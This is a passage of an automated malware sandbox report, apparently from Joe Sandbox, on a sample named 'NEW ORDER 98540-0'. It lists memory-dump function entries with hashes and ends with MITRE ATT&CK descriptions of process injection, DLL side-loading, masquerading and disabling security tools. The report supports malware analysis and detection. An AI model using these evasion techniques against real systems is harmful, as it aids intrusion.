Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce34f4369d785688b8c383e5c937b5647ed4c75ee15c4b23f59536445f435f84
Instruction ID: 225965e616974e739d293d3fafd24821f33eb54d9e3ecf5b913382f76ae5a6e1
Opcode Fuzzy Hash: ce34f4369d785688b8c383e5c937b5647ed4c75ee15c4b23f59536445f435f84
Instruction Fuzzy Hash: 9D512EB0206146CFC719DB2AF980A483FA1EBD630530161ADD5206B27ADB792D8BCB41

Uniqueness

Uniqueness Score: -1.00%

Function 030DF3FD Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7851766441031829e16cb4e3917358922032fd851a648bec147391050eb6687
Instruction ID: 60a32b8cfd93498f91ed5190d6b39e54effe9566b6a55f0d33b35dbc7c8a8157
Opcode Fuzzy Hash: c7851766441031829e16cb4e3917358922032fd851a648bec147391050eb6687
Instruction Fuzzy Hash: EB41FD317013068FCB59EB38D95466E7BFAABC9244FA88868D406DB385EE35CC46C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 030D5098 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f4919d28aeceeaf7478495ea7afa41be4c973c940fc6d29cbd6eb7bda94dd3
Instruction ID: 893fd7274d74de221e70170642a78d94b20d77555393a77ac97b1fe64a0c0706
Opcode Fuzzy Hash: d5f4919d28aeceeaf7478495ea7afa41be4c973c940fc6d29cbd6eb7bda94dd3
Instruction Fuzzy Hash: 52419F38602305CFDB58EB78D9546AD7BF6EF8E244F1504A8D806EB3A0DB769C41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030D1138 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6058738ba88cf8fbaf6063c7a659b9685316248684647f515c1293fbd3bc6b98
Instruction ID: 1f9b8be0722ffb8d5aa5cba766d62cb4955c8039092a95adb1bfb0bc76eb251e
Opcode Fuzzy Hash: 6058738ba88cf8fbaf6063c7a659b9685316248684647f515c1293fbd3bc6b98
Instruction Fuzzy Hash: D851DCB0206147CFC719DF2AFA809483FA1FBD530530661ADD5206B27ADB796D8ADF41

Uniqueness

Uniqueness Score: -1.00%

Function 030DF2C0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f07408ac18714a276b5c6c036578c3841caee2d42116bde1a028bc7da212e08
Instruction ID: ee8c895ae1a02f2e05302af13dd48109028eb9afdb1f33b035dea4e667a5c56e
Opcode Fuzzy Hash: 5f07408ac18714a276b5c6c036578c3841caee2d42116bde1a028bc7da212e08
Instruction Fuzzy Hash: 66313834E0031A9BCB19CF65D89469EB7F6BF89300F148529E906EB750EB70AC42CB44

Uniqueness

Uniqueness Score: -1.00%

Function 030D6F78 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e382c7fd234167d03bdef9d39ba6248b3813d3fce00ea121ad76acf5134571
Instruction ID: a004fc27d3de0c4ec079addeb9aa73171435910ebf9773460ffc38e5bfaadbef
Opcode Fuzzy Hash: 75e382c7fd234167d03bdef9d39ba6248b3813d3fce00ea121ad76acf5134571
Instruction Fuzzy Hash: 98315C30E1121ADBDB14CFA8D45479EBBF6FF85710F648565E806EB280DB71E8468B50

Uniqueness

Uniqueness Score: -1.00%

Function 030D26DF Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929b14370404b3481f4f53c040d6f00f69a0ca2daa26e5e21ef9bbc1c1c4fc53
Instruction ID: 03da1d8668ddb464bf7488cf0b59db813bcbf2a3e4c76c5a75c199cd31ccff62
Opcode Fuzzy Hash: 929b14370404b3481f4f53c040d6f00f69a0ca2daa26e5e21ef9bbc1c1c4fc53
Instruction Fuzzy Hash: F141FDB0901349DFDB10DFA9C984A9EBBF9EF48310F248429E809AB254DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030DF2D0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dabd784dd551a059eecbb9dacf4ff35843659f24a4f6d1971f1c71d0faa66976
Instruction ID: 6969cd7324010f76cb9489583b0ee933e36feaa484e6ea516fbb1de9e9eaecaa
Opcode Fuzzy Hash: dabd784dd551a059eecbb9dacf4ff35843659f24a4f6d1971f1c71d0faa66976
Instruction Fuzzy Hash: AB313934E0030A9BCB19CF69D89469EB7F6BF89300F14C529E916EB750DB70AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 030D26E8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00756f9332e3b281f40ea8803e4bed82c9b4baffae49cb4aa3af2c10a13cf2a7
Instruction ID: ff047a858d0f523c5b86810c62ba3c25675d1e086a8a5f83f224074cefccb6dd
Opcode Fuzzy Hash: 00756f9332e3b281f40ea8803e4bed82c9b4baffae49cb4aa3af2c10a13cf2a7
Instruction Fuzzy Hash: B241EEB0D01349DFDB10DFA9C984A9EBBF5FF48310F248429E809AB254DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030D50A8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b096afaa3ded038c25e85bbe6bbcc315f3cad7408a8484bf20d640e54f53485
Instruction ID: c4db49443a4de362e9582cd6805d76fc01aaa51285fd1814fab458a0778de7e2
Opcode Fuzzy Hash: 7b096afaa3ded038c25e85bbe6bbcc315f3cad7408a8484bf20d640e54f53485
Instruction Fuzzy Hash: 65316F38B02305CFDB58EB79D9106AD77F6AF8D240F1004A8C905AB394DF7A9C42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 030D9251 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb9fd681183cde93258dd01e87b27a1881ad625fb338e4c71d9cf9033df2dde
Instruction ID: 2f023bdacc03a88aff779d85de7af9cdd830cc081aac63c18e72ed5c3421c5c9
Opcode Fuzzy Hash: 8bb9fd681183cde93258dd01e87b27a1881ad625fb338e4c71d9cf9033df2dde
Instruction Fuzzy Hash: CC318F71E0120A9BDB45CFA5D8846AEF7F6FF89300F14C659E805EB350DB71A886CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030D9260 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f083d6274195601ef8023963fc20c0f79368778d79e123943896a6a30eecc3
Instruction ID: a5e562c8e03d7a7d582837f660b4cdf2f21864db9d04816e7eeca086724b61c3
Opcode Fuzzy Hash: 08f083d6274195601ef8023963fc20c0f79368778d79e123943896a6a30eecc3
Instruction Fuzzy Hash: FF217130E1130A9BDB45CFA9D8846AEF7F6FF89300F54C659E805EB250DB709886CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030D1380 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bf8e5a09b284884c1429033ac2e21f02466ba90dfecc84eac762c8d696fb37
Instruction ID: 6bd00d0f8a9518411cdfd517a87e14f29cdeb68aaa9627b8114812aca4e7b168
Opcode Fuzzy Hash: 73bf8e5a09b284884c1429033ac2e21f02466ba90dfecc84eac762c8d696fb37
Instruction Fuzzy Hash: 1A21C6706023058BDBFDD634E48936C3BE8E746310F1449A9F406CBA91DE689C85D756

Uniqueness

Uniqueness Score: -1.00%

Function 030D9150 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81c7ed4d5db81b11189305c70b1d459b34480eabdf18cda10733477baec9417
Instruction ID: 382db38be78c338a33ca13a181d74a9a2d6526f708cccde1d0e394169bfbe5db
Opcode Fuzzy Hash: e81c7ed4d5db81b11189305c70b1d459b34480eabdf18cda10733477baec9417
Instruction Fuzzy Hash: A0219234E013099BCB18CFA4D844AAEF7F6AF89300F54866AEC15FB341DB70A845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030D16A0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5aabad9bd0882dc252722b5edca4abbbac73f15361ac8cb98eca51c8960c6c
Instruction ID: 4dd487de1b2d2d531b9ba4176b4d222420d70fd7559d652e23968d996a0a9a91
Opcode Fuzzy Hash: 5f5aabad9bd0882dc252722b5edca4abbbac73f15361ac8cb98eca51c8960c6c
Instruction Fuzzy Hash: 0821C5306012058BEFA8D735F88471A3BF9E785304F145A69E816CB271EE78EC818B91

Uniqueness

Uniqueness Score: -1.00%

Function 030D4F88 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2a615a9ed136c32fdc680dc9711fe94c0107e0cd54b996086dc3c5334e63d1
Instruction ID: 3c8219722544115c8e22e2d1293f3dac9ced306db6d8d9a9db1467fa6b66ec5d
Opcode Fuzzy Hash: 5d2a615a9ed136c32fdc680dc9711fe94c0107e0cd54b996086dc3c5334e63d1
Instruction Fuzzy Hash: E1213B34701205CFDB54DB79D958AADBBF5EF8D300B1144A8E806EB3A4DB769D01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0158D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3339497354.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_158d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89490fa008ba2484d52c30063b0ed3cabce533bcd3dbbfedb540ba1b7c14db36
Instruction ID: 1c0bc13e670bdd799b992b3b2c11fa16e9aff3fa7d18b76790eed0a5cecae9d5
Opcode Fuzzy Hash: 89490fa008ba2484d52c30063b0ed3cabce533bcd3dbbfedb540ba1b7c14db36
Instruction Fuzzy Hash: BD210075604204EFDB15EF94D980B2ABBF1FB84314F20C96DD90A5F292D77AD407CA61

Uniqueness

Uniqueness Score: -1.00%

Function 030D9160 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c826fef3845349fd3efeea7d004a5b55d469260c1281cb7cbedf36a750256574
Instruction ID: 112ae696e9a466a5b9ea0855288dbbdb8bcac2ea4cfc2697064c9cda14ddfc5b
Opcode Fuzzy Hash: c826fef3845349fd3efeea7d004a5b55d469260c1281cb7cbedf36a750256574
Instruction Fuzzy Hash: 3E216234E013199BCB18CFA4D8546AEF7F6AF89310F54865AEC15FB340DB70A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030D1888 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a766100a0e39c7302e22ff68bc2912012a0c85c5369dd58e4747be6b16669c06
Instruction ID: f20dc05404f5e07b75ccfa0a42b9058fd47294eec9fda1031df72401f3d7bd78
Opcode Fuzzy Hash: a766100a0e39c7302e22ff68bc2912012a0c85c5369dd58e4747be6b16669c06
Instruction Fuzzy Hash: AB214A34B01305CFDB98EB78D6147AEB7F6AF89201F1404A8C106EB294DF768D41CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 030D16B0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7815fafe10f383c21620af9f8ccc835a658125258d7d19531a784341f23a02
Instruction ID: 34d20260a0005f88792fb95381383b956ce9ee2b3fdf4eb711003fc8095a794b
Opcode Fuzzy Hash: ae7815fafe10f383c21620af9f8ccc835a658125258d7d19531a784341f23a02
Instruction Fuzzy Hash: C421C6306112058BEF98D735F88471A3BE9E7C5314F145A69E416CB261DF78EC858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 030D4F98 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3196dbc7c2205f7ba3e2583cc56377bf87055a1ae4b806ce5ac018f45b96b9
Instruction ID: 82ba117388cdaac9d5e05c3f2c12ae6b1d52f71bf3f663bcc535af4ba33b23fc
Opcode Fuzzy Hash: 1f3196dbc7c2205f7ba3e2583cc56377bf87055a1ae4b806ce5ac018f45b96b9
Instruction Fuzzy Hash: 3E213934701204CFDB54EB79DA58AAD7BF6EF8D200F1104A8E906EB3A4DB769D01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030D0838 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1a35001f5091a124d2a259f25d82e30a5f7e3e09de5684ea1ba7f19fd60231
Instruction ID: e065aa07ca137071f6bfda10da82aba30f1fcd991b72897fc0e4c27b53bb07ca
Opcode Fuzzy Hash: 7e1a35001f5091a124d2a259f25d82e30a5f7e3e09de5684ea1ba7f19fd60231
Instruction Fuzzy Hash: 12110A31B0230E8BDFA5D675D40436D7BE5FB81210F2888B9D48ECF251DA65DC854BD2

Uniqueness

Uniqueness Score: -1.00%

Function 0158D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3339497354.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_158d000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bdbfc42a4ee6c8b50b587128f81bd4142ac5aab6b615efa77a5ed4352f1cf0d
Instruction ID: 8b054da541eb8f98149469a9dca0041877d336fd85b2fd9f9ff7f572a08587fc
Opcode Fuzzy Hash: 3bdbfc42a4ee6c8b50b587128f81bd4142ac5aab6b615efa77a5ed4352f1cf0d
Instruction Fuzzy Hash: BE217C75509384CFDB02DF64D990715BFB1FB46214F28C5EAD8498F2A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 030D0848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18365bd821f725bb3c2c101f9324011f796a2079117a9d02cad628600c53d94
Instruction ID: 5ab79206486ded0ecbf89c75e6e1c0c38444c880f87d4815994646dcfdc321dd
Opcode Fuzzy Hash: e18365bd821f725bb3c2c101f9324011f796a2079117a9d02cad628600c53d94
Instruction Fuzzy Hash: BC110630B0230E8BEF94DB7AD40476E76D9FB81210F2488B8E14ACF255DE65DC818BD1

Uniqueness

Uniqueness Score: -1.00%

Function 030D17C0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9ff961df58d58f945dcf6d747d3231a2021a66884f7e07b39d78c52d2538e2
Instruction ID: b9708a3933127f90a109b4d1ab947074f1694579e54dcf3b7f09641eaa4dde23
Opcode Fuzzy Hash: bf9ff961df58d58f945dcf6d747d3231a2021a66884f7e07b39d78c52d2538e2
Instruction Fuzzy Hash: B71102B6F01355ABDB80DF75E80865E7FF9EB48660F140475E906D3300EA34C8419782

Uniqueness

Uniqueness Score: -1.00%

Function 030D148B Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3f8d89506fbcd2aaa7c0cdc8e9d44a2bbdaf472e22dd9e00b06563f5f487dd
Instruction ID: f6118cb8924df03751cf68248165276359fc83758963eaa8934efb3f6a9c5549
Opcode Fuzzy Hash: 1f3f8d89506fbcd2aaa7c0cdc8e9d44a2bbdaf472e22dd9e00b06563f5f487dd
Instruction Fuzzy Hash: 91115235A023159BCF95EFB894502AD7AF6EB48210B28047AD406EB341EB35D941CB95

Uniqueness

Uniqueness Score: -1.00%

Function 030D1498 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d273679b204ab29490a2a16cdd9ef34140f9de6537182042ac71ae19814dca
Instruction ID: b64fde1c3ecb279c9b8a21d6ed7099de8328365d3caf5185377d36a4c830bf9d
Opcode Fuzzy Hash: 53d273679b204ab29490a2a16cdd9ef34140f9de6537182042ac71ae19814dca
Instruction Fuzzy Hash: 14014435A023159BCB95EFB8945029E77F6EF48210F240479D405EF300EB35D941CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 030D80F1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d1aba56afde15b190afb0ba62beac6b08e19f7de91110fe5c6bbea3fd122993
Instruction ID: b41e89fae407f704c895f0da4f6cbbeddf6ea52d66e1aa1c80daf5a915b79c78
Opcode Fuzzy Hash: 1d1aba56afde15b190afb0ba62beac6b08e19f7de91110fe5c6bbea3fd122993
Instruction Fuzzy Hash: 3801D83090028ADFDB46EBB8F84458D7FF1EBC1300F5442ACC504AB1A1EE752D46D791

Uniqueness

Uniqueness Score: -1.00%

Function 030D1524 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f87792189794e0827418de9470df80f009b00fca879b15618397da0cd1fdfd
Instruction ID: 7a8548736a4727a1f901ddf00738f7f2f53836214374bf17f69bf28e2618b65e
Opcode Fuzzy Hash: 82f87792189794e0827418de9470df80f009b00fca879b15618397da0cd1fdfd
Instruction Fuzzy Hash: 66F0F637A06310DFCB56CBE494902ACBBF1EE9812171940D7D806DF715DB29D442C751

Uniqueness

Uniqueness Score: -1.00%

Function 030D7090 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5e244a05935d566cf9bafe30530a51072cc94ba2c10eb9ca06fda6a7435549
Instruction ID: 59df6d1e6cbd32c8637db69a3aa45e9c03cfd9b1c1ba92845320de65fb5272a3
Opcode Fuzzy Hash: 3e5e244a05935d566cf9bafe30530a51072cc94ba2c10eb9ca06fda6a7435549
Instruction Fuzzy Hash: B1F01435B01208CFC714DB74E5A8A6C7BB2EF88215F5040A8E5068B3A0DF31AD42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 030D8100 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a878cfc1f39dc1451e83c2a7d393e889b3a4a2e170bc0b976eeca18104758ce5
Instruction ID: 87b127a4f05d3bc9e68a2e78459723034e871adb6d53367aa967cf9dad5cbf02
Opcode Fuzzy Hash: a878cfc1f39dc1451e83c2a7d393e889b3a4a2e170bc0b976eeca18104758ce5
Instruction Fuzzy Hash: 84F04F7090014EDFDB45EBA8F88159D7BB5FBC0300F50926CCA05AB260EE752E869B91

Uniqueness

Uniqueness Score: -1.00%

Function 030D6BF8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb16ac1389b90c2ac26e5d924bc6fde06b017dfc315346ac788fcc8c1e681023
Instruction ID: 028d8552d12e23801c99cd1177e91aee1798e8dca6c4bd319cb904983059abfa
Opcode Fuzzy Hash: bb16ac1389b90c2ac26e5d924bc6fde06b017dfc315346ac788fcc8c1e681023
Instruction Fuzzy Hash: FCF0E572789690CFC705DB3CE4C80D6BFE6EB8512630801DFC0898B142CA2288468780

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
